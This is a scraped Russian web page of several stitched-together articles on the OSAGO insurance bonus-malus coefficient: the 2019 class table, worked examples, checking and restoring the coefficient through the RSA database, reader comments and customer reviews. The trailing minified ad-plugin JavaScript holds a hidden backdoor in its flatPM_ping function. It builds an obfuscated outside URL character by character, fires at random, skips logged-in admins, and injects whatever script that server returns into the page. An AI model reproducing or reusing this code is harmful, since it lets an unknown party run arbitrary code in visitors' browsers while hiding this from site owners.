Посчитать бонус малус

Таблица КБМ ОСАГО 2019

КБМ или коэффициент «Бонус-Малус» — это коэффициент, который используется страховыми компаниями при расчете страховой премии по договору. В зависимости от наличия или отсутствия аварий «Бонус-Малус» может быть понижающим или повышающим. Для удобства определения данного коэффициента создана специальная КБМ таблица по ОСАГО.

Проверить КБМ

Что значат строки в таблице

Стоимость договора напрямую зависит от того, какой будет применен класс КБМ по ОСАГО.

Вся таблица поделена на несколько разделов. В первом столбце указан класс водителя на момент страхования. Водитель, который впервые обращается к представителю компании, с целью оформления полиса, автоматически получает начальный 3 класс. Именно от него будет происходить расчет в большую или меньшую сторону.

Во второй строке указана скидка, коэффициент бонус-малус, в процентном соотношении.

В последнем столбце указано наличие или отсутствие обращений, в течение страхового года.

Как пользоваться таблицей

Пользоваться таблицей очень просто. Для определения коэффициента необходимо знать только: какой класс был на момент страхования и сколько аварийных случаев было в течение действия данного договора. Со вторым значением просто, поскольку каждый водитель знает, случались ли аварии, или нет. Первое значение можно узнать в страховой организации или на странице проверки КБМ.

Для проверки необходимо внести: ФИО, дату рождения, серию и номер водительского удостоверения. После внесения персональных сведений автоматически произойдет проверка.

Для того чтобы лично узнать коэффициент на начало страхования необходимо обратиться в офис компании, где был оформлен договор. При себе необходимо иметь паспорт, оформленный договор и водительское удостоверение. По времени проверка бонус-малус занимает не более 10 минут.

После того как вы узнаете свой класс, необходима таблица КБМ ОСАГО 2019 года, для определения значения. В первом столбце таблице необходимо найти свой класс. Во втором столбце будет отражена скидка, или повышающий коэффициент, который был использован при расчете премии по договору. Далее определяется бонус-малус на следующий год. При отсутствии выплат он опускается вниз по таблице на одну строчку. Если были аварии, он поднимается вверх по таблице, в зависимости от аварий.

Пример расчета КБМ по таблице

Вашему вниманию два примера. В первом случае водитель проездил год без убытков, во втором у водителя были аварии. Рассмотрим, как работает таблица КБМ класса водителя, при отсутствии и наличии страховых случаев.

Иванов Сергей Петрович обратился к страховщику 11 ноября 2015 года. На момент оформления договора водителю присвоили 9 класс КБМ, а именно 30% скидка к базовому тарифу по полису. Получается, клиент уже пользовался услугами страховой компании не один раз и каждый получал 5% за безаварийную езду.

Пример № 1: Отсутствие аварий

Спустя год Сергей Петрович вновь обратился в страховую организацию, для получения нового договора. Как и ранее у клиента не было аварий, и сотрудник предоставила понижающий бонус за безаварийный год. Для определения она использовала таблицу «Бонус-Малус» по ОСАГО.

У Сергея Петровича был 9 класс, двигаясь по этой строке вправо, в таблице, страховой агент посмотрела новый класс, при количестве страховых случаев «0». После 9 идет 10, которому соответствует скидка 0,65 или 35% к итоговой стоимости договора страхования. Получается, по новому договору получит скидку, в размере 35%.

Пример № 2: Наличие трех аварий

Спустя год Сергей Петрович вновь обратился к представителю страховой компании, для оформления нового договора. К сожалению, за последний год у клиента было 3 аварии, по его вине. В связи с этим клиент не рассчитывал на хорошую скидку.

У Сергея Петровича был 9 класс. Двигаясь по строке, нужно посмотреть новый коэффициент, который присваивается водителю, у которого было 3 аварии. Новый класс, который получает аварийный водитель, равен 1 или повышающий коэффициент 1,55. Получается, клиент должен оплатить повышенную страховую премию.

КБМ при неограниченной страховке

Если оформлен полис, по которому предусмотрено неограниченное количество лиц, допущенных к управлению транспортным средством, то возникает вопрос: класс бонуса-малуса, как узнать? В таком случае расчет бонуса идет по собственнику машины.

Коэффициент по собственнику определяется аналогично, как по водителю. Единственное, что стоит принимать во внимание, скидка на машину по собственнику закрепляется на конкретную машину и не распространяется на другие.

К примеру, вы несколько лет подряд, без аварий, оформляете договор на машину ВАЗ 2110 и заработали максимальный класс, в размере 50%. При покупке новой машине, Kia Ria, при условии неограниченного количества лиц, по ОСАГО, вам будет присвоен начальный – 3 показатель. Получается, новая машина – это новая система скидок.

No related posts.

Таблица КБМ ОСАГО 2019: 34 комментария

закрылась страх, компания «ЖАСО» , все документы по страхованию переданы страховой компании «СОГАЗ». Я пять лет страховалась в ЖАСО, но «СОГАЗ» мне в продлении страхования ОСАГО отказали объяснив что по № ПТС я должна страховаться в ООО»НСГ РОСЭНЕРГО», и т. к. у меня заканчивается старый полис я вынуждена была целый день искать этот один единственный на весь город филиал, но вот страховка обошлась без скидок
не нашли КБМ . Куда обратиться ПОДСКАЖИТЕ.

Огромное спасибо ! Мне вернули КБМ —0.55 . Вот как его узаконить для страховой компании ?

У меня 17 лет водительского стажа и слава Богу никогда не был в ДТП у меня на сегодняшний день кбм 085 то есть 6 класс Почему Я всё это время ещё нахожусь в шестом классе

Большое Спасибо ! После рассмотрения Моего заявления о перерасчете коэффиэнта КБМ Мне вернули 1811 руб.

Я в течение двух лет оформляла страховку без ограничений, машину не меняла, класс бонуса-малуса на третий год 3 при условии безаварийной езды. Агенты поясняют, что обо мне нет данных как о водителе… Это правильно? И еще один вопрос: если я попала в ДТП по вине другого водителя, оформляла страховой случай, то это отразится на моем КБМ?

Здравствуйте подскажите как вернуть кбм уменя 10 лет стажа аварий по моей вене не было, а класс у меня почему-то 11(кбм 0,6)

Владимир, все верно. Всего 13 классов КБМ.
За каждый год безаварийной езды добовляеться 1 класс.

Добрый день ! Вот не могу понять ,почему присвоили класс 5 и скидка всего 10 процентов ,если ограниченная страховка и без аварийность 3 года

Добрый день! Cтрахуюсь больше 10 лет на данный момент у меня при проверке на сайте максимальная скидка, но последние 4 года в страховку вписываю жену и мне последние 4 года считают по 3-му классу, получается у жены коэффициент не меняется. Это действительно так или страховая не выполняет свои обязанности должным образом?

Доброго дня! У меня стаж вождения с 1993 года, а скидка 20%, у жены более 10 лет, ей в Госстрахе вообще скидку потеряли, как вернуть баллы? А платить как новичок, я не намерен, нашей вины нет и дтп не было.

А если была авария, но не по вине водителя.
Тогда что? Какой КБМ?
Скажем КБМ = 0.5. Было ДТП не по вине водителя.
Какой у него КБМ на следующий год?

Проверить КБМ по базе РСА

Инструкция по расчету КБМ:

  1. Выбор объекта проверки (водитель, собственник).
  2. Ввод всех данных (ФИО, стаж, дата рождения, серия и номер водительского удостоверения).
  3. Нажать на кнопку «добавить водителя» (при необходимости).
  4. Финальное действие – кнопка «Проверить».

Рассчитайте ОСАГО и КБМ в режиме онлайн:

Проверка и восстановление коэффициента бонус-малус

Поправки к базовому тарифу ОСАГО оказывают существенное влияние на стоимость полиса. На сайте нашего агентства «Элемент» есть возможность проверить КБМ онлайн по базе РСА самостоятельно. Для этих целей на веб-странице размещено специальное приложение, которое позволяет узнавать упомянутый коэффициент. Сделать это могут не только пользователи, проживающие в Москве, но и из любого региона в нашей стране.

Что такое КБМ и его влияние на стоимость полиса

Наше агентство выступает посредником между автостраховщиками и водителями или собственниками транспортных средств. Мы заключаем договора от имени страховых компаний. Аббревиатура КБМ расшифровывается как коэффициент бонус-малус. Величина его, по сути, определяет размер наценки или скидки за наличие или отсутствие ДТП для конкретного участника движения. Данный показатель является обязательным при оформлении страхового полиса.

Специальное приложение, установленное на официальном сайте агентства, обеспечивает возможность проверить КБМ по базе РСА онлайн самостоятельно и быстро. Данное ПО имеет интуитивно понятный алгоритм использования, позволяющий выполнить все процедуры без привлечения специалистов. Сотрудники нашего агентства, тем не менее, готовы помочь в данном вопросе совершенно бесплатно. Также Вы можете узнать свой коэффициент бонус малус самостоятельно, рассчитав по таблице КБМ, расположенной ниже.

Таблица КБМ на 2019 год

Состав сведений и порядок проверки КБМ

Каждый водитель может рассчитать коэффициент бонус-малус самостоятельно и сравнить его со значением, зафиксированным в базе данных Российской страховой ассоциации. Онлайн-проверка КБМ по базе РСА осуществляется только при наличии данных о водителе или владельце автомобиля. Делается это следующим образом:

  • В графе количество водителей, отмечаете нужное значение, максимум – четыре.
  • Указываете дату проверки. Для оформления следующего полиса ОСАГО принимается значение поправки на следующий день после завершения предыдущего договора.
  • Вводите паспортные данные.
  • Вписываете реквизиты удостоверения водителя.

Вводить информацию в форму нужно очень внимательно. Точное выполнение перечисленных действий позволяет достоверно узнать КБМ и сравнить его с расчетным. Коэффициент понадобится при оформлении полиса ОСАГО с использованием онлайн-сервиса нашего агентства.

Восстановление поправочного коэффициента

За длительную безаварийную езду и отсутствие страховых выплат по договору водитель на начало последующего года повышается в классе от начального М до 13. При этом значение коэффициента уменьшается с максимального в 2,45 до минимального в 0,5. Это существенно влияет на стоимость полиса. В отдельных случаях проверка КБМ показывает, сведения в базу данных агентом не внесены, и страхователь остается в прежней позиции.

Если такое случилось то необходимо написать письмо в РСА и приложить к нему копию договора. Оператор внесет исправления в систему, после чего нужно будет проверить бонус малус ОСАГО и убедиться в этом. При выявлении ошибки участник дорожного движения имеет право на возврат разницы в стоимости полисов, расчет по которым производился с использованием некорректных данных.

Расчет КБМ

В настоящее время от надежности вождения зависит не только жизнь, здоровье, но и возможность сэкономить на приобретении страховки. Приятно осознавать, что чем меньше совершено ДТП, тем дешевле будет обходиться страховка автомобиля.

Расчет КБМ производится с целью премирования или наказания водителей, ведь страховые компании заинтересованы в экономии своих средств на выплатах. Как же это работает на практике?

Что такое КБМ и от чего он зависит

КБМ – это коэффициент бонус-малус. КБМ зависит от класса водителя. Для расчета стоимости полиса выделяют 15 классов водителя: М и от 0 до 13, где М – самый низкий уровень. Чем ниже уровень, тем выше КБМ, на который умножается изначальная стоимость ОСАГО:

В класс М можно попасть, даже совершив одно ДТП за год, по которому страховая компания производила выплаты. Поэтому, от каждодневного соблюдения правил дорожного движения будет зависеть сохранение денежных средств на приобретение полиса ОСАГО.

Как самому рассчитать КБМ

Самому рассчитать КБМ достаточно просто. Можно воспользоваться приведенной ниже таблицей и примерами.

Допустим, класс водителя на момент заключения нового договора был М. Следовательно, КБМ для него 2,45. И ровно во столько раз увеличится стоимость страховки. Если в течение года страховая компания не сделает ни одной выплаты по ДТП, то на начало следующего страхового года водитель перейдет в класс 1, а стоимость его полиса ОСАГО будет умножаться уже на коэффициент 2,3.

Еще один, более показательный пример. Допустим, водитель на начало года имел класс 12. Скидка на его полис составит 45%. И если в течение года он не станет виновником аварий, и страховая не будет производить выплат, то его класс вырастет до 13. Однако, если в течение года страховая произведет хотя бы одну выплату, то класс упадет до 6. И в следующем году скидка по страховке составит лишь 15%. Последующие выплаты также будут понижать класс вплоть до М.

Как рассчитать КБМ онлайн

Если у водителя есть история, т.е. он не новичок, то рассчитать или проверить КБМ поможет онлайн-калькулятор. Важно помнить, что КБМ не привязан к автомобилю, а только к водителю.

Описание нашего сервиса и принцип его работы

Работа с виджетом по проверке текущего значения КБМ доступна всем водителям. Здесь можно рассчитать или проверить свой КБМ. Ведь иногда случается, что данные по водителю внесены случайно или намеренно неверно.
Водитель может ознакомиться со своим КБМ абсолютно бесплатно. А в случае обнаружения ошибки может изменить свой КБМ за небольшую плату.

Достаточно заполнить данные в форме ниже:

  • внести ФИО в специально отведенные для этого поля;
  • аналогично внести дату рождения;
  • номер своего водительского удостоверения;
  • нажать на желтую кнопку «Проверить данные».

Программа покажет КБМ и стаж вождения.

Как рассчитать КБМ, если два водителя

КБМ рассчитывается для каждого водителя отдельно. Но расчет стоимости полиса производится с коэффициентом водителя более низкого класса. Т.е. если в полис включено два водителя, один из которых имеет класс 13, а другой класс М, то стоимость полиса будет увеличена в 2,45 раза. Именно такой КБМ у второго водителя. К этому надо быть готовым, вписывая к себе в полис кого-то ещё.

Как отправить заявку на снижение КБМ

При проверке КБМ программа автоматически предложит снизить КБМ, подав заявку на эту услугу. Причем программа предоставляет гарантию возврата денежных средств в случае, если КБМ не снизится.

Надо будет внести данные по старым правам, если происходила их смена. Если таких данных у водителя нет, то программа за дополнительную небольшую плату запросит их в ГИБДД самостоятельно. Если происходила смена фамилии, то это также необходимо указать. Затем внести свой электронный адрес или номер телефона.

Оплачивается заявка при помощи карты МИР или VISA. После оплаты при помощи почты или СМС будут предоставлены кассовый чек, уведомление об оплате, номер заявки и адрес страницы для отслеживания результатов.

Срок и стоимость восстановления КБМ

В случаях некорректного внесения данных по водителям сотрудниками страховых компаний или замены прав (смены фамилии) может потребоваться восстановление КБМ. Это можно сделать самостоятельно. Достаточно написать заявление в офисе своей страховой компании или онлайн через их официальный сайт. В первом случае ответ обязаны предоставить в течение пяти рабочих дней, во втором – в течение десяти дней.

На нашем сайте все можно сделать достаточно быстро, не выходя из дома. Это платная услуга, но цена приемлемая. Достаточно заполнить анкету (см.главу 4.2. и 4.4.) и оплатить заявку. Система отправит данное обращение в АИС РСА. В течение пяти рабочих дней, начиная со следующего после подачи заявки, от РСА поступит ответ. Часто это происходит уже на следующий день. Если КБМ окажется ниже, чем система выдавала до этого, то водитель сможет вернуть переплаченные деньги по предыдущим полисам. Если КБМ останется на прежнем уровне, то сайт вернет деньги.

Как рассчитать стоимость полиса ОСАГО в разных страховых компаниях

У каждой страховой компании, как правило, есть возможность оформления полиса ОСАГО онлайн. Можно внести требуемые данные и посмотреть стоимость своего полиса.

Существует независимый онлайн-калькулятор полиса ОСАГО. Рекомендуется сначала прибегнуть к его расчетам, ведь зачастую страховые компании навязывают дополнительные услуги (скрытые страховки), включая их в стоимость полиса.

  1. физическое или юридическое лицо является владельцем автомобиля;
  2. тип ТС;
  3. регион;
  4. мощность двигателя;
  5. период использования ТС;
  6. лица, допущенные к управлению, т.е. те, кто будет внесен в страховку дополнительно;
  7. КБМ (вносится КБМ водителя самого низкого класса).

Калькулятор произведет ориентировочный расчет. Теперь на него можно опираться, оформляя полис ОСАГО в выбранной страховой компании.

Основные причины неправильного расчета КБМ

КБМ рассчитывается страховой компанией, и причин его неправильного расчета может быть несколько. Играет роль так называемый «человеческий фактор». Но зачастую сам водитель предполагает более низкий КБМ, тогда как в действительности он гораздо выше. Например, забывает о выплатах страховой по ДТП с его участием или не страхует автомобиль в течение года.

Какие же причины неправильного расчета КБМ могут быть на самом деле:

  • Страховая компания потеряла данные. Такое часто случается при переходе из одной компании в другую.
  • Неверно введенные данные в страховой компании.
  • Замена водительских прав.
  • Смена фамилии.
  • Несостоявшаяся передача данных в систему АИС РСА.
  • Приобретение фальшивого полиса ОСАГО.

Во всех этих случаях можно обратиться в страховую компанию. Водитель вправе связаться со своей страховой компанией онлайн или лично оставив заявление в офисе. Если по каким-либо причинам водителю откажут в выявлении причин, то клиент вправе обратить на официальный сайт ЦБ. Нажав на вкладку «полисы ОСАГО» можно увидеть графу «подать жалобу». Но ЦБ принимает к рассмотрению только те полисы, срок действия по которым истек не более года назад. Можно обратиться и в РСА, если страховая компания ушла с рынка.

Заключение

Разобравшись в нюансах расчета КБМ и действия данного коэффициента на практике, можно убедиться в его эффективности. Но также не стоит забывать о проверке данного коэффициента, ведь стоимость ОСАГО существенно зависит от его значения.

Проверка КБМ по базе РСА

* виджет проверки КБМ размещен на правах рекламы, согласно партнерского соглашения с kbmka.ru. Подробнее с условиями оказания услуги можно ознакомиться на сайте.

При заключении или продлении договора ОСАГО для расчета итоговой стоимости страхования применяется коэффициент бонус-малус (КБМ). КБМ может увеличить или, наоборот, уменьшить стоимость полиса, в зависимости от количества аварий и страховых выплат, которые были зафиксированы за заключающим договор лицом в предыдущий период.

Коэффициент обновляется ежегодно и при стаже безаварийной езды в 10 лет достигает своего максимального значения – 0,5, или скидки в размере 50% от стоимости полиса.

К сожалению, нередки случаи, когда автолюбители вдруг узнают, что скидки у них больше нет. В такой ситуации необходимо проверить данные, внесенные в базу АИС Российского союза автостраховщиков. Проверка КБМ по базе РСА занимает не больше минуты и доступна всем пользователям бесплатно. Для проверки коэффициента необходимо зайти на сайт РСА и пройти по пути «ОСАГО» – «Расчет стоимости ОСАГО» – «Проверить КБМ».

Чтобы приступить к проверке, надо согласиться с обработкой персональных данных, поставив галочку в соответствующем окошке.
Проверка КБМ по базе РСА доступна только для граждан и резидентов РФ.

Если собственник транспортного средства юридическое лицо, для проверки будет необходимо указать:

  • ИНН собственника автомобиля;
  • VIN или знак государственной регистрации ТС;
  • Номер кузова и шасси;
  • Дату начала действия договора или допсоглашения.

При заполнении данных о транспортном средстве указываются только цифры и латинские или кириллические буквы.

При проверке коэффициента физического лица, являющегося собственником транспортного средства, если договор заключён без ограничения круга лиц, которые допущены к управлению автомобилем, указываются:

  • Фамилия, имя и отчество собственника ТС;
  • Дата рождения;
  • Тип удостоверяющего личность документа, его серия и номер;
  • VIN или знак государственной регистрации ТС;
  • Номер шасси и кузова;
  • Дата начала действия договора или допсоглашения.

Если договор заключен с указанием ограниченного количества лиц, которые допущены к управлению ТС, для проверки необходимо указать:

  • Фамилию, имя и отчество каждого водителя;
  • Дату рождения (полностью);
  • Данные водительского удостоверения (серия и номер);
  • Дату начала действия договора или допсоглашения.

Для получения корректной информации важно правильно указать дату запроса: она должна совпадать с датой начала действия нового полиса, но не раньше следующего дня после окончания предыдущего договора. После подтверждения кода безопасности на странице будет отражена запрашиваемая информация.

Если по расчетам скидка КБМ должна быть больше, но в системе это не отражено, прежде чем подать заявление страховщику на восстановление КБМ и жалобу в РСА, необходимо убедиться в следующем:

  • Действительно ли за прошедший период не было страховых случаев и выплат;
  • Действительно ли прошел полный год. Скидка увеличивается каждый год на 5%, если прошедший период меньше, скидка остается прежней;
  • Не прошло ли больше года после окончания договора автострахования. КБМ сохраняется в течение одного года после окончания срока действия полиса ОСАГО, если договор страхования более не продлевается, скидка обнуляется.

Если все факты говорят о том, что коэффициент указан неверно, необходимо заняться его восстановлением. С декабря 2015 года действует упрощенная схема, согласно которой для применения корректного КБМ достаточно направить заявление о несогласии в страховую компанию, с которой страхователь заключил или собирается заключить договор. Далее страховой также проводится проверка КБМ по базе РСА и, в случае некорректных данных, заменяет значение коэффициента.

Если же по какой-то причине восстановить КБМ таким способом не получится, необходимо составить и направить жалобу в РСА как вышестоящую организацию, контролирующую деятельность страховых компаний. Для подачи жалобы по факту некорректного применения коэффициента бонус-малус необходимо заполнить обращение в Союз, шаблон которого находится в подразделе «Направить жалобу в РСА», и приложить копии паспорта и водительского удостоверения. При подаче жалобы в обязательном порядке указываются:

  • Фамилия, имя и отчество (полностью);
  • Дата рождения (полностью);
  • Номер водительского удостоверения.

При отсутствии одного из документов или некорректном заполнении заявления жалоба не будет рассмотрена. Документ отправляется по обычной почте, представляется лично или отправляется в виде скан-копии на электронный адрес Союза. Срок рассмотрения РСА обращения с проверкой коэффициента по базе – 30 дней.

После восстановления корректного КБМ данные обновляются в АИС РСА и расчет дальнейшей скидки производится корректно. Возврат переплаты по полисам ОСАГО осуществляется через обращение в ЦБ: после подтверждения переплаты страховщик перечисляет страхователю сумму на указанный расчетный счет.

Калькулятор КБМ

Новости об ОСАГО

Инструкция: как продать подержанную машину

Новые правила: что меняется в законах с 1 июня 2019 года

Очень довольна работой компании и в частности отделением на Лавочкина 13к6

Страховой случай произошел 25.11.2019 г. Заявку на страховое возмещение подала 26.11.2019 г. Оценку провели сразу же на месте. Выплату в полном объеме получила 27.11.2019 г. Все очень оперативно, я довольна компанией. Заявку подавала в офисе на Лавочкина 13к6. Приветливая и вежливая команда. Молодцы!

Диана Скворцова, Москва

Оформление ОСАГО стандартная обязательная процедура. В этом году решил в поисковике посмотреть условия страхования в разных компаниях и увидел ссылку на Mafin. Перейдя по ссылке сразу был приятно удивлён алгоритмом взаимодействия с клиентом. Когда же по итогам предварительного расчёта стоимости ОСАГО получил одну из самых оптимальных сумм в сравнении с другими страховыми компаниями, то сомнений в.

Тинькофф страхование очень порадовало

После страхового случая по ОСАГО, позвонил оператору Тинькофф страхование и рассказал ситуацию. Оператор девушка с милым голоском) мне всё очень доходчиво объяснила. Зарегистрировали мне страховой случай и сказали ждать, с вами свяжется наш специалист. Буквально на следующий день мне позвонили и предложили выбрать сервис для оценки стоимости ущерба. Выбрал рядом с домом и на следующий день.

остался доволен работой страховой

Попал в мелкое ДТП, ОСАГО у меня было оформлено в СК «Согласие», делал электронное. Ущерб обоим автомобилям минимальный, пострадавших не было. Обошлись составлением ЕВРО-протокола. Благо и у меня, и другого водителя были готовые бланки (кстати рекомендую иметь под рукой всегда, их на сайте «Согласия» не трудно скачать). И уже с протоколом эксперт Согласия оценил ущерб, и через двенадцать дней.

Выплата по ОСАГО

ДТП с моим участием произошло 26.09.2019. 28.09.2019 предоставил все документы в страховую компанию «РЕСО — гарантия». В течение 2 недель провели экспертизу, оценили ущерб. 15.10.2019 уже произвели выплату в полном объеме. По сумме нареканий нет, на ремонт хватает. Номер дела ПР 9707105. Рекомендую данную страховую компанию. Обслуживаниям доволен.

ОСАГО ,не первый раз

Второй год подряд офрлмяла полис в Евроинс ,всем довольна, обслужиливали хорошо, вопросов лишних не было . Надеюсь,обойдется без дтп ,а так все устраивает МММ-6000969969

Неправильный расчёт по ОСАГО

Добрый день. У меня 20.08.2019 года произошло ДТП по вине автомобиля, который застрахован в вашей компании. Страховой случай 001GS19-038454. Меня изначально направили в ЛАТ, где я отдала полный пакет документов, а также реквизиты своего банка. Там же я уточнила, могу ли я делать ремонт самостоятельно. Мне сказали, что конечно можете. Мне сделали осмотр автомобиля. Спустя 20 дней мне прислали.

В страховую сколько помню ходил будь то полис просто офрмить будь то урегулирование ущерба — всегда сотрудники недовольные и очень грубые были! Повезло сменить место жительства а вместе с этим и страховую, перешел на Росгосстрах, ничего особо нового не ожидая, просто потомучто офис прям через дорогу от нового дома) Пришел туда страховку сделать, что за работники — прям искренне удивился, не.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}